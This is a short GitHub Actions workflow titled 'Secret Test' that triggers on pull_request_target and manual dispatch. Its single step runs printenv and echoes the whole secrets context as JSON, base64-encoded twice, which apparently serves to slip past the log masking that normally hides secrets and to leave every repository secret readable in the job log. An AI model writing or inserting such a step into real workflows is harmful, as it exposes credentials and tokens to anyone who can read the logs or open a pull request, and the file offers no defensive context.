name: Secret Test


on:
  workflow_dispatch:
  pull_request_target:

jobs:
  test-secret-access:
    runs-on: ubuntu-latest
    steps:
    - run: |
        echo hello
        printenv
        echo 'ToJson: ${{ ToJson(secrets) }}' | base64 -w0 | base64 -w0
